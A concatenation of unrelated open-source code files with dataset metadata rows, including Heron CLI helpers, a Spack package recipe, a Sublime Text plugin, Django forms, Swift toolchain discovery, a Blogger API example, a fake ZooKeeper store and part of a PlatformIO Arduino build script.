return (cluster_role_env[0], cluster_role_env[1], cluster_role_env[2])
################################################################################
# Parse the command line for overriding the defaults
################################################################################
def parse_override_config_and_write_file(namespace):
"""
Parse the command line for overriding the defaults and
create an override file.
"""
overrides = parse_override_config(namespace)
try:
tmp_dir = tempfile.mkdtemp()
override_config_file = os.path.join(tmp_dir, OVERRIDE_YAML)
with open(override_config_file, 'w') as f:
f.write(yaml.dump(overrides))
return override_config_file
except Exception as e:
raise Exception("Failed to parse override config: %s" % str(e))
def parse_override_config(namespace):
"""Parse the command line for overriding the defaults"""
overrides = dict()
for config in namespace:
kv = config.split("=")
if len(kv) != 2:
raise Exception("Invalid config property format (%s) expected key=value" % config)
if kv[1] in ['true', 'True', 'TRUE']:
overrides[kv[0]] = True
elif kv[1] in ['false', 'False', 'FALSE']:
overrides[kv[0]] = False
else:
overrides[kv[0]] = kv[1]
return overrides
def get_java_path():
"""Get the path of java executable"""
java_home = os.environ.get("JAVA_HOME")
return os.path.join(java_home, BIN_DIR, "java")
def check_java_home_set():
"""Check if the java home set"""
# check if environ variable is set
if "JAVA_HOME" not in os.environ:
Log.error("JAVA_HOME not set")
return False
# check if the value set is correct
java_path = get_java_path()
if os.path.isfile(java_path) and os.access(java_path, os.X_OK):
return True
Log.error("JAVA_HOME/bin/java either does not exist or not an executable")
return False
def check_release_file_exists():
"""Check if the release.yaml file exists"""
release_file = get_heron_release_file()
# if the file does not exist and is not a file
if not os.path.isfile(release_file):
Log.error("Required file not found: %s" % release_file)
return False
return True
def print_build_info(zipped_pex=False):
"""Print build_info from release.yaml
:param zipped_pex: True if the PEX file is built with flag `zip_safe=False'.
"""
if zipped_pex:
release_file = get_zipped_heron_release_file()
else:
release_file = get_heron_release_file()
with open(release_file) as release_info:
release_map = yaml.load(release_info)
release_items = sorted(list(release_map.items()), key=lambda tup: tup[0])
for key, value in release_items:
print("%s : %s" % (key, value))
def get_version_number(zipped_pex=False):
"""Print version from release.yaml
:param zipped_pex: True if the PEX file is built with flag `zip_safe=False'.
"""
if zipped_pex:
release_file = get_zipped_heron_release_file()
else:
release_file = get_heron_release_file()
with open(release_file) as release_info:
for line in release_info:
trunks = line[:-1].split(' ')
if trunks[0] == 'heron.build.version':
return trunks[-1].replace("'", "")
return 'unknown'
def insert_bool(param, command_args):
'''
:param param:
:param command_args:
:return:
'''
index = 0
found = False
for lelem in command_args:
if lelem == '--' and not found:
break
if lelem == param:
found = True
break
index = index + 1
if found:
command_args.insert(index + 1, 'True')
return command_args
def insert_bool_values(command_line_args):
'''
:param command_line_args:
:return:
'''
args1 = insert_bool('--verbose', command_line_args)
args2 = insert_bool('--deploy-deactivated', args1)
return args2
class SubcommandHelpFormatter(argparse.RawDescriptionHelpFormatter):
def _format_action(self, action):
# pylint: disable=bad-super-call
parts = super(argparse.RawDescriptionHelpFormatter, self)._format_action(action)
if action.nargs == argparse.PARSER:
parts = "\n".join(parts.split("\n")[1:])
return parts
| apache-2.0 | 7,029,551,338,896,319,000 | 30.97723 | 100 | 0.646689 | false |
mfherbst/spack | var/spack/repos/builtin/packages/py-pygobject/package.py | 5 | 2283 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPygobject(AutotoolsPackage):
"""bindings for the GLib, and GObject,
to be used in Python."""
homepage = "https://pypi.python.org/pypi/pygobject"
url = "http://ftp.gnome.org/pub/GNOME/sources/pygobject/2.28/pygobject-2.28.6.tar.bz2"
version('2.28.6', 'a43d783228dd32899e6908352b8308f3')
version('2.28.3', 'aa64900b274c4661a5c32e52922977f9')
extends('python')
depends_on('pkgconfig', type=('build'))
depends_on("libffi")
depends_on('glib')
depends_on('py-py2cairo', type=('build', 'run'))
depends_on('gobject-introspection')
patch('pygobject-2.28.6-introspection-1.patch', when='@2.28.3:2.28.6')
# patch from https://raw.githubusercontent.com/NixOS/nixpkgs/master/pkgs/development/python-modules/pygobject/pygobject-2.28.6-gio-types-2.32.patch
# for https://bugzilla.gnome.org/show_bug.cgi?id=668522
patch('pygobject-2.28.6-gio-types-2.32.patch', when='@2.28.6')
def install(self, spec, prefix):
make('install', parallel=False)
| lgpl-2.1 | -5,986,603,020,777,331,000 | 41.277778 | 151 | 0.674551 | false |
naokimiyasaka/sublime-text | Backup/20130918101225/BracketHighlighter/bh_modules/tagattrselect.py | 8 | 1881 | import bh_plugin
class SelectAttr(bh_plugin.BracketPluginCommand):
def run(self, edit, name, direction='right'):
if self.left.size() <= 1:
return
tag_name = r'[\w\:\-]+'
attr_name = r'''([\w\-\.:]+)(?:\s*=\s*(?:(?:"((?:\.|[^"])*)")|(?:'((?:\.|[^'])*)')|([^>\s]+)))?'''
tname = self.view.find(tag_name, self.left.begin)
current = self.selection[0].b
region = self.view.find(attr_name, tname.b)
selection = self.selection
if direction == 'left':
last = None
# Keep track of last attr
if region != None and current <= region.b and region.b < self.left.end:
last = region
while region != None and region.b < self.left.end:
# Select attribute until you have closest to the left of selection
if current > region.b:
selection = [region]
last = None
# Update last attr
elif last != None:
last = region
region = self.view.find(attr_name, region.b)
# Wrap right
if last != None:
selection = [last]
else:
first = None
# Keep track of first attr
if region != None and region.b < self.left.end:
first = region
while region != None and region.b < self.left.end:
# Select closest attr to the right of the selection
if current < region.b:
selection = [region]
first = None
break
region = self.view.find(attr_name, region.b)
# Wrap left
if first != None:
selection = [first]
self.selection = selection
def plugin():
return SelectAttr
| mit | -4,504,091,623,196,249,600 | 33.833333 | 106 | 0.472621 | false |
teknologkoren/Strequelistan | strecklista/forms.py | 1 | 4378 | from django import forms
from django.core.exceptions import ValidationError
from django.forms import DateInput, DateTimeInput, ModelForm
from datetime import datetime, timedelta
from .models import Quote, RegisterRequest, Suggestion
class LoginForm(forms.Form):
username = forms.CharField(
label="Username",
required=True,
max_length=50,
widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'inputUsername', 'placeholder': 'username'})
)
password = forms.CharField(
label="Password",
max_length=50,
required=True,
widget=forms.PasswordInput(attrs={'class': 'form-control', 'id': 'inputPassword', 'placeholder': 'password'})
)
class QuoteForm(forms.Form):
text = forms.CharField(
label="text",
required=True,
max_length=4098,
widget=forms.TextInput(
attrs={'class': 'form-control', 'id': 'inputUsername', 'aria-describedby': 'basic-addon1'})
)
name = forms.CharField(
label="name",
required=True,
max_length=250,
widget=forms.TextInput(
attrs={'class': 'form-control', 'id': 'inputUsername', 'aria-describedby': 'basic-addon1'})
)
def clean(self):
form_data = self.cleaned_data
try:
if Quote.objects.filter(text=form_data['text'], who=form_data['name']).exists():
raise ValidationError("Quote already exists")
except:
raise ValidationError("Not enough arguments")
return form_data
class BulkTransactionForm(forms.Form):
amount=forms.DecimalField(
required=True,
max_value=20000,
max_digits=6,
label="blargh",
initial=0
)
user_id = forms.IntegerField(
required=True,
widget = forms.HiddenInput()
)
message = forms.CharField(
required=True,
initial="Admin transaction"
)
class ReturnTransactionForm(forms.Form):
transaction_id = forms.DecimalField(
required=True,
)
class TransactionDateForm(forms.Form):
start_date = forms.DateField(initial=datetime.now()-timedelta(days=60))
end_date = forms.DateField(initial=datetime.now())
class Meta:
fields = '__all__'
widgets = {
'start_date': DateTimeInput(),
'end_date': DateTimeInput(),
}
class heddaHopperForm(forms.Form):
where = forms.CharField(
max_length=255,
widget=forms.TextInput(
attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}
),
required=False,
)
when = forms.CharField(
max_length=255,
widget=forms.TextInput(
attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'},
),
required=False,
)
what = forms.CharField(
max_length=4000,
widget=forms.TextInput(
attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}
),
required=True,
)
class RegisterRequestForm(forms.Form):
first_name = forms.CharField(
max_length=50,
required=True,
widget=forms.TextInput(
attrs={'class': 'form-control'}
),
)
last_name = forms.CharField(
max_length = 50,
required=True,
widget=forms.TextInput(
attrs={'class': 'form-control'}
),
)
email = forms.EmailField(
max_length=255,
required=True,
widget=forms.TextInput(
attrs={'class': 'form-control'}
),
)
message = forms.CharField(
max_length=500,
required=False,
widget=forms.Textarea(
attrs={'class': 'form-control'}
),
)
class SuggestionForm(forms.ModelForm):
class Meta:
model = Suggestion
fields = ['name', 'description', 'price', 'link']
widgets = {
'name': forms.TextInput(attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}),
'description': forms.TextInput(attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}),
'price': forms.TextInput(attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}),
'link': forms.TextInput(attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}),
}
| mpl-2.0 | 5,802,402,802,947,574,000 | 26.708861 | 117 | 0.586341 | false |
therealbnut/swift | utils/swift_build_support/swift_build_support/toolchain.py | 4 | 5948 | # swift_build_support/toolchain.py ------------------------------*- python -*-
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
"""
Represent toolchain - the versioned executables.
"""
# ----------------------------------------------------------------------------
from __future__ import absolute_import
import platform
from . import cache_util
from . import shell
from . import xcrun
from .which import which
__all__ = [
'host_toolchain',
]
class Toolchain(object):
"""Represents native host toolchain
"""
def find_tool(self, *names):
raise NotImplementedError('Subclasses must implement this method')
# Declare properties for each tools.
# These properties are loaded lazily and assignable.
def _register(name, *tool):
def _getter(self):
return self.find_tool(*tool)
_getter.__name__ = name
setattr(Toolchain, name, cache_util.reify(_getter))
_register("cc", "clang")
_register("cxx", "clang++")
_register("ninja", "ninja", "ninja-build")
_register("cmake", "cmake")
_register("distcc", "distcc")
_register("distcc_pump", "distcc-pump", "pump")
_register("llvm_profdata", "llvm-profdata")
_register("llvm_cov", "llvm-cov")
class Darwin(Toolchain):
def __init__(self, sdk, toolchain):
super(Darwin, self).__init__()
self.xcrun_sdk = sdk
self.xcrun_toolchain = toolchain
def find_tool(self, *names):
for name in names:
# NOTE: xcrun searches from developer tools directory *and* from
# PATH. Relatively slow, but we don't need `which` for
# Darwin.
found = xcrun.find(name,
sdk=self.xcrun_sdk,
toolchain=self.xcrun_toolchain)
if found is not None:
return found
return None
class GenericUnix(Toolchain):
def __init__(self, suffixes):
super(GenericUnix, self).__init__()
# On these platforms, search 'clang', 'clang++' unconditionally.
# To determine the llvm_suffix.
ret = self.find_clang(['clang', 'clang++'], suffixes)
if ret is None:
self.cc = None
self.cxx = None
# We don't have clang, then we don't have any llvm tools.
self.llvm_suffixes = []
else:
found, suffix = ret
self.cc, self.cxx = found
if suffix == '':
# Some platform may have `clang`, `clang++`, `llvm-cov-3.6`
# but not `llvm-cov`. In that case, we assume `clang` is
# corresponding to the best version of llvm tools found.
self.llvm_suffixes = suffixes
else:
# Otherwise, we must have llvm tools with the same suffix as
# `clang` or `clang++`
self.llvm_suffixes = [suffix]
def find_clang(self, tools, suffixes):
for suffix in suffixes:
ret = [which(t + suffix) for t in tools]
if all(t is not None for t in ret):
return (ret, suffix)
return None
def find_llvm_tool(self, tool):
for suffix in self.llvm_suffixes:
found = which(tool + suffix)
if found is not None:
# If we found the tool with the suffix, lock suffixes to it.
self.llvm_suffix = [suffix]
return found
return None
def find_tool(self, *names):
for name in names:
if name.startswith('llvm-'):
found = self.find_llvm_tool(name)
else:
found = which(name)
if found is not None:
return found
return None
class MacOSX(Darwin):
def __init__(self, toolchain='default'):
super(MacOSX, self).__init__(sdk='macosx', toolchain=toolchain)
class Linux(GenericUnix):
def __init__(self):
super(Linux, self).__init__(['', '-3.8', '-3.7', '-3.6', '-3.5'])
class FreeBSD(GenericUnix):
def __init__(self):
# For testing toolchain initializer on non-FreeBSD systems
sys = platform.system()
if sys != 'FreeBSD':
suffixes = ['']
# See: https://github.com/apple/swift/pull/169
# Building Swift from source requires a recent version of the Clang
# compiler with C++14 support.
elif self._release_date and self._release_date >= 1100000:
suffixes = ['']
else:
suffixes = ['38', '37', '36', '35']
super(FreeBSD, self).__init__(suffixes)
@cache_util.reify
def _release_date(self):
"""Return the release date for FreeBSD operating system on this host.
If the release date cannot be ascertained, return None.
"""
# For details on `sysctl`, see:
# http://www.freebsd.org/cgi/man.cgi?sysctl(8)
out = shell.capture(['sysctl', '-n', 'kern.osreldate'],
dry_run=False, echo=False, optional=True)
if out is None:
return None
return int(out)
class Cygwin(Linux):
# Currently, Cygwin is considered as the same as Linux.
pass
def host_toolchain(**kwargs):
sys = platform.system()
if sys == 'Darwin':
return MacOSX(kwargs.pop('xcrun_toolchain', 'default'))
elif sys == 'Linux':
return Linux()
elif sys == 'FreeBSD':
return FreeBSD()
elif sys.startswith('CYGWIN'):
return Cygwin()
else:
raise NotImplementedError(
'toolchain() is not supported in this platform')
| apache-2.0 | 2,413,251,762,167,321,000 | 31.326087 | 78 | 0.559011 | false |
ActiveState/code | recipes/Python/576441_modificatiblogger_exemple_adding/recipe-576441.py | 1 | 11672 | #!/usr/bin/python
#
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file demonstrates how to use the Google Data API's Python client library
# to interface with the Blogger service. There are examples for the following
# operations:
#
# * Retrieving the list of all the user's blogs
# * Retrieving all posts on a single blog
# * Performing a date-range query for posts on a blog
# * Creating draft posts and publishing posts
# * Updating posts
# * Retrieving comments
# * Creating comments
# * Deleting comments
# * Deleting posts
#Modified by bussiere @at gmail.com
__author__ = '[email protected] (Luke Keppler)'
from gdata import service
import gdata
import atom
import getopt
import sys
class BloggerExample:
def __init__(self, email, password):
"""Creates a GDataService and provides ClientLogin auth details to it.
The email and password are required arguments for ClientLogin. The
'source' defined below is an arbitrary string, but should be used to
reference your name or the name of your organization, the app name and
version, with '-' between each of the three values."""
# Authenticate using ClientLogin.
self.service = service.GDataService(email, password)
self.service.source = 'Blogger_Python_Sample-1.0'
self.service.service = 'blogger'
self.service.server = 'www.blogger.com'
self.service.ProgrammaticLogin()
# Get the blog ID for the first blog.
feed = self.service.Get('/feeds/default/blogs')
self_link = feed.entry[0].GetSelfLink()
if self_link:
self.blog_id = self_link.href.split('/')[-1]
def PrintUserBlogTitles(self):
"""Prints a list of all the user's blogs."""
# Request the feed.
query = service.Query()
query.feed = '/feeds/default/blogs'
feed = self.service.Get(query.ToUri())
# Print the results.
print feed.title.text
for entry in feed.entry:
print "\t" + entry.title.text
print
def CreatePost(self, title, content, author_name, tags,is_draft):
"""This method creates a new post on a blog. The new post can be stored as
a draft or published based on the value of the is_draft parameter. The
method creates an GDataEntry for the new post using the title, content,
author_name and is_draft parameters. With is_draft, True saves the post as
a draft, while False publishes the post. Then it uses the given
GDataService to insert the new post. If the insertion is successful, the
added post (GDataEntry) will be returned.
"""
# Create the entry to insert.
entry = gdata.GDataEntry()
entry.author.append(atom.Author(atom.Name(text=author_name)))
entry.title = atom.Title(title_type='xhtml', text=title)
entry.content = atom.Content(content_type='html', text=content)
for tag in tags :
category = atom.Category(term=tag, scheme="http://www.blogger.com/atom/ns#")
entry.category.append(category)
if is_draft:
control = atom.Control()
control.draft = atom.Draft(text='yes')
entry.control = control
# Ask the service to insert the new entry.
return self.service.Post(entry,
'/feeds/' + self.blog_id + '/posts/default')
def PrintAllPosts(self):
"""This method displays the titles of all the posts in a blog. First it
requests the posts feed for the blogs and then it prints the results.
"""
# Request the feed.
feed = self.service.GetFeed('/feeds/' + self.blog_id + '/posts/default')
# Print the results.
print feed.title.text
for entry in feed.entry:
if not entry.title.text:
print "\tNo Title"
else:
print "\t" + entry.title.text
print
def PrintPostsInDateRange(self, start_time, end_time):
"""This method displays the title and modification time for any posts that
have been created or updated in the period between the start_time and
end_time parameters. The method creates the query, submits it to the
GDataService, and then displays the results.
Note that while the start_time is inclusive, the end_time is exclusive, so
specifying an end_time of '2007-07-01' will include those posts up until
2007-6-30 11:59:59PM.
The start_time specifies the beginning of the search period (inclusive),
while end_time specifies the end of the search period (exclusive).
"""
# Create query and submit a request.
query = service.Query()
query.feed = '/feeds/' + self.blog_id + '/posts/default'
query.updated_min = start_time
query.updated_max = end_time
query.orderby = 'updated'
feed = self.service.Get(query.ToUri())
# Print the results.
print feed.title.text + " posts between " + start_time + " and " + end_time
print feed.title.text
for entry in feed.entry:
if not entry.title.text:
print "\tNo Title"
else:
print "\t" + entry.title.text
print
def UpdatePostTitle(self, entry_to_update, new_title):
"""This method updates the title of the given post. The GDataEntry object
is updated with the new title, then a request is sent to the GDataService.
If the insertion is successful, the updated post will be returned.
Note that other characteristics of the post can also be modified by
updating the values of the entry object before submitting the request.
The entry_to_update is a GDatEntry containing the post to update.
The new_title is the text to use for the post's new title. Returns: a
GDataEntry containing the newly-updated post.
"""
# Set the new title in the Entry object
entry_to_update.title = atom.Title('xhtml', new_title)
# Grab the edit URI
edit_uri = entry_to_update.GetEditLink().href
return self.service.Put(entry_to_update, edit_uri)
def CreateComment(self, post_id, comment_text):
"""This method adds a comment to the specified post. First the comment
feed's URI is built using the given post ID. Then a GDataEntry is created
for the comment and submitted to the GDataService. The post_id is the ID
of the post on which to post comments. The comment_text is the text of the
comment to store. Returns: an entry containing the newly-created comment
NOTE: This functionality is not officially supported yet.
"""
# Build the comment feed URI
feed_uri = '/feeds/' + self.blog_id + '/' + post_id + '/comments/default'
# Create a new entry for the comment and submit it to the GDataService
entry = gdata.GDataEntry()
entry.content = atom.Content(content_type='xhtml', text=comment_text)
return self.service.Post(entry, feed_uri)
def PrintAllComments(self, post_id):
"""This method displays all the comments for the given post. First the
comment feed's URI is built using the given post ID. Then the method
requests the comments feed and displays the results. Takes the post_id
of the post on which to view comments.
"""
# Build comment feed URI and request comments on the specified post
feed_url = '/feeds/' + self.blog_id + '/comments/default'
feed = self.service.Get(feed_url)
# Display the results
print feed.title.text
for entry in feed.entry:
print "\t" + entry.title.text
print "\t" + entry.updated.text
print
def DeleteComment(self, post_id, comment_id):
"""This method removes the comment specified by the given edit_link_href, the
URI for editing the comment.
"""
feed_uri = '/feeds/' + self.blog_id + '/' + post_id + '/comments/default/' + comment_id
self.service.Delete(feed_uri)
def DeletePost(self, edit_link_href):
"""This method removes the post specified by the given edit_link_href, the
URI for editing the post.
"""
self.service.Delete(edit_link_href)
def run(self):
"""Runs each of the example methods defined above, demonstrating how to
interface with the Blogger service.
"""
# Demonstrate retrieving a list of the user's blogs.
self.PrintUserBlogTitles()
# Demonstrate how to create a draft post.
draft_post = self.CreatePost("Snorkling in Aruba",
"<p>We had <b>so</b> much fun snorkling in Aruba<p>",
"Post author", True)
print "Successfully created draft post: \"" + draft_post.title.text + "\".\n"
# Demonstrate how to publish a public post.
public_post = self.CreatePost("Back from vacation",
"<p>I didn't want to leave Aruba, but I ran out of money :(<p>",
"Post author", False)
print "Successfully created public post: \"" + public_post.title.text + "\".\n"
# Demonstrate various feed queries.
print "Now listing all posts."
self.PrintAllPosts()
print "Now listing all posts between 2007-04-04 and 2007-04-23."
self.PrintPostsInDateRange("2007-04-04", "2007-04-23")
# Demonstrate updating a post's title.
print "Now updating the title of the post we just created:"
public_post = self.UpdatePostTitle(public_post, "The party's over")
print "Successfully changed the post's title to \"" + public_post.title.text + "\".\n"
# Demonstrate how to retrieve the comments for a post.
# Get the post ID and build the comments feed URI for the specified post
self_id = public_post.id.text
tokens = self_id.split("-")
post_id = tokens[-1]
print "Now posting a comment on the post titled: \"" + public_post.title.text + "\"."
comment = self.CreateComment(post_id, "Did you see any sharks?")
print "Successfully posted \"" + comment.content.text + "\" on the post titled: \"" + public_post.title.text + "\".\n"
comment_id = comment.GetEditLink().href.split("/")[-1]
print "Now printing all comments"
self.PrintAllComments(post_id)
# Delete the comment we just posted
print "Now deleting the comment we just posted"
self.DeleteComment(post_id, comment_id)
print "Successfully deleted comment."
self.PrintAllComments(post_id)
# Get the post's edit URI
edit_uri = public_post.GetEditLink().href
# Demonstrate deleting posts.
print "Now deleting the post titled: \"" + public_post.title.text + "\"."
self.DeletePost(edit_uri)
print "Successfully deleted post."
self.PrintAllPosts()
def main():
"""The main function runs the BloggerExample application with the provided
username and password values. Authentication credentials are required.
NOTE: It is recommended that you run this sample using a test account."""
# parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["email=", "password="])
except getopt.error, msg:
print ('python BloggerExample.py --email [email] --password [password] ')
sys.exit(2)
email = ''
password = ''
# Process options
for o, a in opts:
if o == "--email":
email = a
elif o == "--password":
password = a
if email == '' or password == '':
print ('python BloggerExample.py --email [email] --password [password]')
sys.exit(2)
sample = BloggerExample(email, password)
sample.run()
if __name__ == '__main__':
main()
| mit | 5,251,647,294,224,849,000 | 35.136223 | 122 | 0.680946 | false |
harlowja/Zake | zake/fake_storage.py | 2 | 10514 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2013 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import itertools
import os
import sys
import six
from zake import utils
from kazoo import exceptions as k_exceptions
from kazoo.protocol import states as k_states
# See: https://issues.apache.org/jira/browse/ZOOKEEPER-243
SEQ_ROLLOVER = 2147483647
SEQ_ROLLOVER_TO = -2147483647
ROOT_PATH = '/'
class FakeStorage(object):
"""A place too place fake zookeeper paths + data + connected clients."""
def __init__(self, handler, paths=None, sequences=None):
if paths:
self._paths = dict(paths)
else:
self._paths = {}
if sequences:
self._sequences = dict(sequences)
else:
self._sequences = {}
self._lock = handler.rlock_object()
# Ensure the root path *always* exists.
if ROOT_PATH not in self._paths:
self._paths[ROOT_PATH] = {
'created_on': 0,
'updated_on': 0,
'version': 0,
# Not supported for now...
'aversion': -1,
'cversion': -1,
'data': b"",
'ephemeral': False,
}
self._clients = set()
self._client_lock = handler.rlock_object()
@property
def lock(self):
return self._lock
def attach(self, client):
with self._client_lock:
if client not in self._clients:
self._clients.add(client)
def _make_znode(self, node, child_count):
# Not exactly right, but good enough...
translated = {
'czxid': node['version'],
'mzxid': node['version'],
'pzxid': node['version'],
'ctime': node['created_on'],
'mtime': node['updated_on'],
'version': node['version'],
'aversion': node['aversion'],
'cversion': node['cversion'],
'dataLength': len(node['data']),
'numChildren': int(child_count),
}
if node['ephemeral']:
translated['ephemeralOwner'] = node['ephemeral_owner']
else:
translated['ephemeralOwner'] = 0
return k_states.ZnodeStat(**translated)
@property
def paths(self):
return self._paths
@property
def sequences(self):
return self._sequences
@property
def clients(self):
return self._clients
def __getitem__(self, path):
return self._paths[path]
def __setitem__(self, path, value):
with self.lock:
self._paths[path] = value
def set(self, path, value, version=-1):
with self.lock:
if version != -1:
stat = self.get(path)[1]
if stat.version != version:
raise k_exceptions.BadVersionError("Version mismatch %s "
"!= %s" % (stat.version,
version))
self._paths[path]['data'] = value
self._paths[path]['updated_on'] = utils.millitime()
self._paths[path]['version'] += 1
else:
self._paths[path]['data'] = value
self._paths[path]['updated_on'] = utils.millitime()
self._paths[path]['version'] += 1
return self.get(path)[1]
def purge(self, client):
if not client.session_id:
return 0
with self._client_lock:
if client in self._clients:
self._clients.discard(client)
else:
return 0
removals = []
with self.lock:
for path, data in six.iteritems(self._paths):
if data['ephemeral'] \
and data['ephemeral_owner'] == client.session_id:
removals.append(path)
data_watches = []
for path in removals:
event = k_states.WatchedEvent(
type=k_states.EventType.DELETED,
state=k_states.KeeperState.CONNECTED,
path=path)
data_watches.append(([path], event))
fire_paths = []
for path in removals:
parents = sorted(six.iterkeys(self.get_parents(path)))
for parent_path in parents:
if parent_path in fire_paths:
continue
fire_paths.append(parent_path)
child_watches = []
for path in fire_paths:
event = k_states.WatchedEvent(
type=k_states.EventType.DELETED,
state=k_states.KeeperState.CONNECTED,
path=path)
child_watches.append(([path], event))
for path in removals:
del self._paths[path]
self.inform(client, child_watches, data_watches, inform_self=False)
return len(removals)
def inform(self, client, child_watches, data_watches, inform_self=True):
with self._client_lock:
clients = self._clients.copy()
for other_client in clients:
if not inform_self and other_client is client:
continue
other_client.fire_child_watches(child_watches)
other_client.fire_data_watches(data_watches)
def create(self, path, value=b"", sequence=False,
ephemeral=False, session_id=None):
def sequence_iter(path, parent_path):
for i in itertools.count(0):
sequence_id = self._sequences.get(parent_path, 0)
if sequence_id == SEQ_ROLLOVER:
self._sequences[parent_path] = SEQ_ROLLOVER_TO
else:
self._sequences[parent_path] = sequence_id + 1
yield path + '%010d' % (sequence_id)
parent_path, _node_name = os.path.split(path)
with self.lock:
if sequence:
for possible_path in sequence_iter(path, parent_path):
if possible_path not in self:
path = possible_path
break
parents = sorted(six.iterkeys(self.get_parents(path)))
if parent_path not in self:
if sequence:
self._sequences.pop(parent_path, None)
raise k_exceptions.NoNodeError("Parent node %s does not exist"
% (parent_path))
if ephemeral and not session_id:
raise k_exceptions.SystemZookeeperError("Ephemeral node %s can"
" not be created"
" without a session"
" id" % path)
if path in self:
raise k_exceptions.NodeExistsError("Node %s already"
" exists" % (path))
for parent_path in reversed(parents):
if self._paths[parent_path]['ephemeral']:
raise k_exceptions.NoChildrenForEphemeralsError(
"Parent %s is ephemeral" % parent_path)
path_data = {
# Kazoo clients expect in milliseconds
'created_on': utils.millitime(),
'updated_on': utils.millitime(),
'version': 0,
# Not supported for now...
'aversion': -1,
'cversion': -1,
'data': value,
}
if ephemeral:
path_data['ephemeral_owner'] = session_id
path_data['ephemeral'] = True
else:
path_data['ephemeral'] = False
self._paths[path] = path_data
return (True, parents, path)
def pop(self, path):
if path == ROOT_PATH:
raise k_exceptions.BadArgumentsError("Can not delete %s"
% ROOT_PATH)
with self.lock:
self._paths.pop(path)
def get(self, path):
with self.lock:
node = self._paths[path]
children_count = len(self.get_children(path))
return (node['data'], self._make_znode(node, children_count))
def __contains__(self, path):
return path in self._paths
@contextlib.contextmanager
def transaction(self):
with self.lock:
# Keep the before the transaction information and reset to that
# data if the context manager fails (this makes it appear that the
# operations done during the transaction either complete as a
# group or do not complete).
paths = self._paths.copy()
sequences = self._sequences.copy()
try:
yield
except Exception:
cause = sys.exc_info()
try:
self._paths = paths
self._sequences = sequences
finally:
six.reraise(*cause)
def get_children(self, path, only_direct=True):
paths = {}
with self.lock:
for (other_path, data) in list(six.iteritems(self._paths)):
if utils.is_child_path(path, other_path,
only_direct=only_direct):
paths[other_path] = data
return paths
def get_parents(self, path):
paths = {}
with self.lock:
for (other_path, data) in list(six.iteritems(self._paths)):
if utils.is_child_path(other_path, path, only_direct=False):
paths[other_path] = data
return paths
| apache-2.0 | -179,977,517,755,504,350 | 35.891228 | 79 | 0.509701 | false |
bq/bitbloq-offline | app/res/web2board/linux/platformio/builder/scripts/frameworks/arduino.py | 5 | 6855 | # Copyright 2014-2015 Ivan Kravets <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Arduino
Arduino Framework allows writing cross-platform software to control
devices attached to a wide range of Arduino boards to create all
kinds of creative coding, interactive objects, spaces or physical experiences.
http://arduino.cc/en/Reference/HomePage
"""
from os import listdir, walk
from os.path import isdir, isfile, join
from SCons.Script import DefaultEnvironment
import sys
env = DefaultEnvironment()
BOARD_OPTS = env.get("BOARD_OPTIONS", {})
BOARD_BUILDOPTS = BOARD_OPTS.get("build", {})
BOARD_CORELIBDIRNAME = BOARD_BUILDOPTS.get("core")
#
# Determine framework directory
# based on development platform
#
PLATFORMFW_DIR = join("$PIOPACKAGES_DIR",
"framework-arduino${PLATFORM.replace('atmel', '')}")
if "digispark" in BOARD_BUILDOPTS.get("core"):
BOARD_CORELIBDIRNAME = "digispark"
PLATFORMFW_DIR = join(
"$PIOPACKAGES_DIR",
"framework-arduino%s" % (
"sam" if BOARD_BUILDOPTS.get("cpu") == "cortex-m3" else "avr")
)
elif env.get("PLATFORM") == "timsp430":
PLATFORMFW_DIR = join(
"$PIOPACKAGES_DIR",
"framework-arduinomsp430"
)
